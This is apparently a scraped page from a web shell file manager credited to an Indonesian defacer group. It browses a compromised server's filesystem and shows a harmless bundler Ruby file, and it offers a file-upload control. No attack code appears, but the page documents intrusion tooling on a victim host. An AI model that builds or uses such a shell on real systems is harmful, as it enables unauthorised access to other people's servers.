whoami7 - Manager
:
/
proc
/
thread-self
/
root
/
opt
/
alt
/
ruby32
/
share
/
gems
/
gems
/
bundler-2.4.19
/
lib
/
bundler
/
ui
/
Upload File:
files >> //proc/thread-self/root/opt/alt/ruby32/share/gems/gems/bundler-2.4.19/lib/bundler/ui/rg_proxy.rb
# frozen_string_literal: true require_relative "../ui" require "rubygems/user_interaction" module Bundler module UI class RGProxy < ::Gem::SilentUI def initialize(ui) @ui = ui super() end def say(message) @ui&.debug(message) end end end end
Copyright ©2021 || Defacer Indonesia